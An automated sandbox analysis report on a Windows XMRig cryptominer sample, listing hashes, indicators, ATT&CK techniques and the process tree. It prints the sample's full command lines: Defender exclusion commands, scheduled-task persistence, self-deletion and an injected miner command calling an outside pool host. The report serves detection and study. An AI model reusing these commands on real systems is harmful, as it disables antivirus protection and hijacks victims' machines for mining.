xmrig | cc6611635ca61701a1aa303698270f8e6d8de4f6fc5e6b3a11c5fa9cb1621972

Analysis

max time kernel
137s
max time network
159s
platform
windows7_x64
resource
win7v20210410
submitted
27-07-2021 00:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cab63b06017beec8efd11d7f03ca5a85.exe
Size

99KB
MD5

cab63b06017beec8efd11d7f03ca5a85
SHA1

4f252e828d51bfe8cf1322e6c18656a8a9b359e2
SHA256

cc6611635ca61701a1aa303698270f8e6d8de4f6fc5e6b3a11c5fa9cb1621972
SHA512

9011b9bed98b8474f59e78966d5c31d36348afb256cc3d0a8406beb8038c03cb4d44b72e2fa4fb6868c8242909d71fcbfdcd359f727b9962293240c563da80e4

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1976-197-0x00000001402EB66C-mapping.dmp	xmrig
behavioral1/memory/1976-201-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Executes dropped EXE 4 IoCs

Processes:

svchost64.exesplwow64.exesvchost64.exesihost64.exe

pid process

864 svchost64.exe
480 splwow64.exe
1836 svchost64.exe
1104 sihost64.exe
Loads dropped DLL 4 IoCs

Processes:

cmd.exesvchost64.execmd.exesvchost64.exe

pid process

1548 cmd.exe
864 svchost64.exe
592 cmd.exe
1836 svchost64.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

pid	process
864	svchost64.exe
480	splwow64.exe
1836	svchost64.exe
1104	sihost64.exe

pid	process
1548	cmd.exe
864	svchost64.exe
592	cmd.exe
1836	svchost64.exe

Drops file in System32 directory 9 IoCs

Processes:

powershell.exepowershell.exesvchost64.exepowershell.exesvchost64.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\splwow64.exe	svchost64.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	svchost64.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	svchost64.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.log	svchost64.exe
File created	C:\Windows\system32\splwow64.exe	svchost64.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

svchost64.exe

description pid process target process

PID 1836 set thread context of 1976 1836 svchost64.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1148 schtasks.exe
1576 schtasks.exe

description	pid	process	target process
PID 1836 set thread context of 1976	1836	svchost64.exe	explorer.exe

pid	process
1148	schtasks.exe
1576	schtasks.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

svchost64.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	svchost64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	svchost64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	svchost64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	svchost64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	svchost64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	svchost64.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exesvchost64.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost64.exe

pid	process
1976	powershell.exe
1976	powershell.exe
1944	powershell.exe
1944	powershell.exe
1052	powershell.exe
1052	powershell.exe
1572	powershell.exe
1572	powershell.exe
864	svchost64.exe
1172	powershell.exe
1172	powershell.exe
1616	powershell.exe
1616	powershell.exe
2040	powershell.exe
2040	powershell.exe
1908	powershell.exe
1908	powershell.exe
1836	svchost64.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exesvchost64.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost64.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	1052	powershell.exe
Token: SeDebugPrivilege	1572	powershell.exe
Token: SeDebugPrivilege	864	svchost64.exe
Token: SeDebugPrivilege	1172	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	1836	svchost64.exe
Token: SeLockMemoryPrivilege	1976	explorer.exe
Token: SeLockMemoryPrivilege	1976	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cab63b06017beec8efd11d7f03ca5a85.execmd.execmd.exesvchost64.execmd.exesplwow64.execmd.execmd.execmd.exesvchost64.execmd.exe

description	pid	process	target process
PID 1080 wrote to memory of 840	1080	cab63b06017beec8efd11d7f03ca5a85.exe	cmd.exe
PID 1080 wrote to memory of 840	1080	cab63b06017beec8efd11d7f03ca5a85.exe	cmd.exe
PID 1080 wrote to memory of 840	1080	cab63b06017beec8efd11d7f03ca5a85.exe	cmd.exe
PID 840 wrote to memory of 1976	840	cmd.exe	powershell.exe
PID 840 wrote to memory of 1976	840	cmd.exe	powershell.exe
PID 840 wrote to memory of 1976	840	cmd.exe	powershell.exe
PID 840 wrote to memory of 1944	840	cmd.exe	powershell.exe
PID 840 wrote to memory of 1944	840	cmd.exe	powershell.exe
PID 840 wrote to memory of 1944	840	cmd.exe	powershell.exe
PID 840 wrote to memory of 1052	840	cmd.exe	powershell.exe
PID 840 wrote to memory of 1052	840	cmd.exe	powershell.exe
PID 840 wrote to memory of 1052	840	cmd.exe	powershell.exe
PID 840 wrote to memory of 1572	840	cmd.exe	powershell.exe
PID 840 wrote to memory of 1572	840	cmd.exe	powershell.exe
PID 840 wrote to memory of 1572	840	cmd.exe	powershell.exe
PID 1080 wrote to memory of 1548	1080	cab63b06017beec8efd11d7f03ca5a85.exe	cmd.exe
PID 1080 wrote to memory of 1548	1080	cab63b06017beec8efd11d7f03ca5a85.exe	cmd.exe
PID 1080 wrote to memory of 1548	1080	cab63b06017beec8efd11d7f03ca5a85.exe	cmd.exe
PID 1548 wrote to memory of 864	1548	cmd.exe	svchost64.exe
PID 1548 wrote to memory of 864	1548	cmd.exe	svchost64.exe
PID 1548 wrote to memory of 864	1548	cmd.exe	svchost64.exe
PID 864 wrote to memory of 1536	864	svchost64.exe	cmd.exe
PID 864 wrote to memory of 1536	864	svchost64.exe	cmd.exe
PID 864 wrote to memory of 1536	864	svchost64.exe	cmd.exe
PID 1536 wrote to memory of 1148	1536	cmd.exe	schtasks.exe
PID 1536 wrote to memory of 1148	1536	cmd.exe	schtasks.exe
PID 1536 wrote to memory of 1148	1536	cmd.exe	schtasks.exe
PID 864 wrote to memory of 480	864	svchost64.exe	splwow64.exe
PID 864 wrote to memory of 480	864	svchost64.exe	splwow64.exe
PID 864 wrote to memory of 480	864	svchost64.exe	splwow64.exe
PID 864 wrote to memory of 936	864	svchost64.exe	cmd.exe
PID 864 wrote to memory of 936	864	svchost64.exe	cmd.exe
PID 864 wrote to memory of 936	864	svchost64.exe	cmd.exe
PID 480 wrote to memory of 360	480	splwow64.exe	cmd.exe
PID 480 wrote to memory of 360	480	splwow64.exe	cmd.exe
PID 480 wrote to memory of 360	480	splwow64.exe	cmd.exe
PID 936 wrote to memory of 1300	936	cmd.exe	choice.exe
PID 936 wrote to memory of 1300	936	cmd.exe	choice.exe
PID 936 wrote to memory of 1300	936	cmd.exe	choice.exe
PID 360 wrote to memory of 1172	360	cmd.exe	powershell.exe
PID 360 wrote to memory of 1172	360	cmd.exe	powershell.exe
PID 360 wrote to memory of 1172	360	cmd.exe	powershell.exe
PID 360 wrote to memory of 1616	360	cmd.exe	powershell.exe
PID 360 wrote to memory of 1616	360	cmd.exe	powershell.exe
PID 360 wrote to memory of 1616	360	cmd.exe	powershell.exe
PID 360 wrote to memory of 2040	360	cmd.exe	powershell.exe
PID 360 wrote to memory of 2040	360	cmd.exe	powershell.exe
PID 360 wrote to memory of 2040	360	cmd.exe	powershell.exe
PID 360 wrote to memory of 1908	360	cmd.exe	powershell.exe
PID 360 wrote to memory of 1908	360	cmd.exe	powershell.exe
PID 360 wrote to memory of 1908	360	cmd.exe	powershell.exe
PID 480 wrote to memory of 592	480	splwow64.exe	cmd.exe
PID 480 wrote to memory of 592	480	splwow64.exe	cmd.exe
PID 480 wrote to memory of 592	480	splwow64.exe	cmd.exe
PID 592 wrote to memory of 1836	592	cmd.exe	svchost64.exe
PID 592 wrote to memory of 1836	592	cmd.exe	svchost64.exe
PID 592 wrote to memory of 1836	592	cmd.exe	svchost64.exe
PID 1836 wrote to memory of 1248	1836	svchost64.exe	cmd.exe
PID 1836 wrote to memory of 1248	1836	svchost64.exe	cmd.exe
PID 1836 wrote to memory of 1248	1836	svchost64.exe	cmd.exe
PID 1836 wrote to memory of 1104	1836	svchost64.exe	sihost64.exe
PID 1836 wrote to memory of 1104	1836	svchost64.exe	sihost64.exe
PID 1836 wrote to memory of 1104	1836	svchost64.exe	sihost64.exe
PID 1248 wrote to memory of 1576	1248	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\cab63b06017beec8efd11d7f03ca5a85.exe
"C:\Users\Admin\AppData\Local\Temp\cab63b06017beec8efd11d7f03ca5a85.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1080

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\cab63b06017beec8efd11d7f03ca5a85.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1548

C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\cab63b06017beec8efd11d7f03ca5a85.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:864

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "splwow64" /tr '"C:\Windows\system32\splwow64.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1536

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "splwow64" /tr '"C:\Windows\system32\splwow64.exe"'
5⤵
- Creates scheduled task(s)
PID:1148

C:\Windows\system32\splwow64.exe
"C:\Windows\system32\splwow64.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:480

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\splwow64.exe"
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:592

C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\splwow64.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1836

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "splwow64" /tr '"C:\Windows\system32\splwow64.exe"' & exit
7⤵
- Suspicious use of WriteProcessMemory
PID:1248

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "splwow64" /tr '"C:\Windows\system32\splwow64.exe"'
8⤵
- Creates scheduled task(s)
PID:1576

C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
7⤵
- Executes dropped EXE
PID:1104

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --donate-level=1 --url=cryptolegion.ddns.net --user={COMPUTERNAME}/LEGION --pass={COMPUTERNAME}/LEGION --cpu-max-threads-hint=20 --cinit-idle-wait=5 --cinit-idle-cpu=80 --nicehash --cinit-stealth
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1976

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
7⤵
PID:2028

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
8⤵
PID:560

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:936

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:1300

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_01363a72-4816-48d4-a6c4-ea4f1520f0d0
MD5
e5b3ba61c3cf07deda462c9b27eb4166

SHA1
b324dad73048be6e27467315f82b7a5c1438a1f9

SHA256
b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

SHA512
a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1bc86d09-585f-4091-a76f-be112dd4843d
MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3

SHA1
ff4f229f4fbacccdf11d98c04ba756bda80aac7a

SHA256
ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

SHA512
edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_43352165-1df8-4ad7-a533-54a03951c502
MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
